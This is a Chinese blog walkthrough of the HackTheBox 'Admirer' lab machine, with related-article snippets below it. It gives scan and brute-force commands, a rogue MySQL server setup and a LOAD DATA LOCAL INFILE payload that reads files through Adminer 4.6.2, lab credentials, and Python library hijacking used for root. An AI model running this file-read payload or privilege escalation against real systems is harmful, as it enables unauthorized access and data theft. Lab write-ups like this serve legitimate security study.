HackTheBox::Admirer

最新推荐文章于 2024-05-22 14:33:16 发布
最新推荐文章于 2024-05-22 14:33:16 发布
阅读量801 收藏
点赞数
分类专栏: Hack The Box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/127318201
版权

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.187
image.png
nmap -Pn -sCV -p 21,22,80 10.10.10.187
image.png
打开80端口的页面后,仅展示几幅画,未发现可利用的地方,尝试进行路径爆破。
image.png
通过robots.txt文件得到路径/admin-dir,打开后提示“403 Forbidden”,在/admin-dir路径下继续进行爆破。
得到两个文件/contacts.txt和/credentials.txt
在/credentials.txt中发现了三组账号和密码。
image.png

0x01 漏洞利用

结合21端口开启了ftp服务,因此使用ftp账号进行登录。
image.png
将文件拷贝到本地进行查看。
在网站源代码里发现了数据库的账号密码,以及提示。
image.png
在新得到的/utility-scripts路径下打开备份文件中存在的路径。
无法打开
image.png
根据提示,猜测可能未完成,或者采用了别的开全产品替代,所以尝试在这个路径下继续进行爆破。
image.png
根据账号密码进行登录,提示账号被禁止登录。
image.png

经过查找Admirer 4.6.2版本有任意文件读取漏洞。
image.png
相关原理参考:
https://dev.mysql.com/doc/refman/8.0/en/load-data-local-security.html
https://xz.aliyun.com/t/3973
最终参考文章:
https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
在mysql中执行如下语句

sudo mysql -u root
create database admirer;
CREATE USER 'test'@'%' IDENTIFIED BY 'test';
GRANT ALL PRIVILEGES ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

image.png
同时将数据库配置文件进行如下更改:
vi /etc/mysql/mariadb.conf.d/50-server.cnf
image.png
systemctl restart mysql
image.png
成功登录
image.png
先在admirer数据库中创建一个表
image.png
执行payload,根据网站的备份文件,可推断出需查看的文件为index.php

load data local infile '../index.php'
into table admirer.aya3t
fields terminated by '/n'

image.png
得到账号密码 waldo/&<h5b~yK3F#{PaPB&dA}{H>
image.png
使用ssh登录
image.png

0x02 权限提升

使用sudo -l发现可能可以提权的脚本
image.png
打开admin_task.sh
image.png
打开backup.sh
image.png
尝试对这个python文件进行写入,但发现没有写入的权限。
因此尝试劫持python调用的库,参考
https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
在/tmp目录下进行写入
image.png
执行命令弹shell
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-admireradminer渗透 & python-library-hijacking)
冬萍子癸水
01-23 645
1、扫描 端口很常规,21进去看看有无价值文件,22可能有登录,80信息搜集 C:\root> nmap -A 10.10.10.187 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 13:28 CST Nmap scan report for 10.10.10.187 (10.10.10.187) Host is up (0.41s latency). Not shown: 997 closed ports PORT STATE SE
Hack the box靶机 Admirer
菜浪马废的博客
09-20 892
不能访问啊 wfuzz一下 wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u http://10.10.10.187/admin-dir/FUZZ.FUZ2Z --hc 404,403 -t 100 三个账号 先看ftp 得到两个文件 压缩包里是网站源码 waldo:Wh3r3_1s_w4ld0? wfuzz -c -w /usr/share/seclists/Dis...
CVE-2021-21311复现学习
shierbai的博客
05-20 622
如图在物理机(不属于上述任何一个ip)输入要访问的主机及其端口(这里这个ip就是在环境中属于内网我们无法直接访问到的那个服务器,而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据),可以看到在139端显示这个请求是由138发出的,而不是自己的ip,这样就完成了ssrf,不过在利用上博主还不太能够善用。adminer版本是4.7.8,是php编写的数据库管理工具,存在漏洞CVE-2021-21311,它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。
vulhub中Adminer远程文件读取漏洞复现(CVE-2021-43008)
yougexiaojiuguan的博客
02-03 1234
漏洞复现过程的记录,也是为了方便自己查看
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
渗透测试中遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 6258
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
adminer_admirer_
10-02
标题“adminer_admirer_”可能指的是一个与Adminer相关的项目或软件的定制版本,其中包含了“admirer”这一特定主题或风格。Adminer是一个开源的数据库管理工具,它允许用户通过Web界面轻松地执行数据库管理和操作,...
admirer:[WIP]一个命令行实用程序,用于在Spotify和Last.fm之间同步喜欢的歌曲
03-25
爱慕者 一个命令行实用程序,用于在Spotify和Last.fm之间同步喜欢的歌曲。 进行中:目前尚不能完全正常运行,并且缺少文档。 执照 Dietrich Moerman版权所有2020。 根据条款发行。
Charmdate ChatOS admirer email sender-crx插件
04-02
语言:русский 创建此扩展,以便于... ...将窗口放在该部分的显示器中,其中它使用简单的工具移动浏览器窗口方便。您可以在前三天内完全免费使用此延期。为此,没有什么需要完成。只需设置扩展并继续工作。...
AsiaMe ChatOS崇拜者电子邮件发件人「AsiaMe ChatOS admirer email sender」-crx插件
03-09
您可以轻松设置搜索工具,并等待... ... 您可以轻松设置搜索工具,并等待,直到找到你的人。 另外,您可以管理您的窗口,以更有效地使用屏幕。 历史,黑名单和其他功能取决于你。...您可以免费使用这个扩展名前三天。...
Charmdate ChatOS崇拜者电子邮件发件人「Charmdate ChatOS admirer email sender」-crx插件
03-08
您可以快速轻松地配置... ...您可以快速轻松地设置简报,并等待系统自动为您找到男性。 将窗口放置在显示器方便的位置,使用简单的工具移动浏览器窗口。 您可以在前三天免费使用此扩展程序。为此,你不必做任何事情。...
渗透入侵\二级域名爆破工具.zip
07-15
二级域名爆破工具
mysql 任意文件读取漏洞_Adminer任意文件读取漏洞
weixin_33918358的博客
02-07 2424
软件简介官方网站:https://www.adminer.org/Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。漏洞原理Adminer任意文件读取漏洞其实来源于MySQL“LOAD DAT...
mssql 数据导成文件_Adminer4.6.2任意文件读取漏洞
weixin_39866741的博客
12-16 625
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类...
adminer.php 漏洞,WordPress InBoundio Marketing Plugin 1.0 /admin/partials/csv_uploader.php 文件上传漏洞...
weixin_33973572的博客
03-18 317
/admin/partials/csv_uploader.php<?php$ds = DIRECTORY_SEPARATOR; //1$storeFolder = 'uploaded_csv'; //2if (!empty($_FILES)) {$_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', ...
配置文件读取绝对路径_Adminer任意文件读取漏洞复现
weixin_30014265的博客
01-31 1483
正文:943字8图预计阅读时间:3分钟简介Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。https://www.adminer.org/#download漏洞复现在攻击机器...
Vulhub——adminer
最新发布
qq_55202378的博客
05-22 547
Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在Adminer登录页面中填写恶意服务地址和用户名。,即可查看到Adminer的登录页面。
phpMyAdmin远程代码执行(CVE-2016-5734)
weixin_41182861的博客
01-03 972
前言 phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用preg_replace e修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。 受影响版本 phpMyAdmin 4.0...
mysql-adminer任意文件读取
qq_51478862的博客
05-05 1189
利用条件 1.adminer(版本小于4.6.2)可以远程连接数据库,2.或者可以使靶机服务器主动连接自己的伪造的mysql服务器 原理 攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。攻击者就可以任意读取受害者的文件内容。,也就是A连接B的数据库,B可以伪造假的数据库服务读取A服务器上的文件。所以基于adminer连接的数据库可以反向利用连接自己的恶意服务器,从而达到读取任意文件的目的。 演示: 先下载好adminer,直接放在根路径即可:(攻击的服务器有adminerWeb
Informix中文教程:监控与管理命令详解
"《Informix精华集锦》是关于Informix数据库的一份详细教程,由CU会员admirer整理,涵盖了Informix的监控和管理命令。教程内容包括使用系统监控接口(SMI)、tbstat和tbcheck等工具来检查和管理Informix系统。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值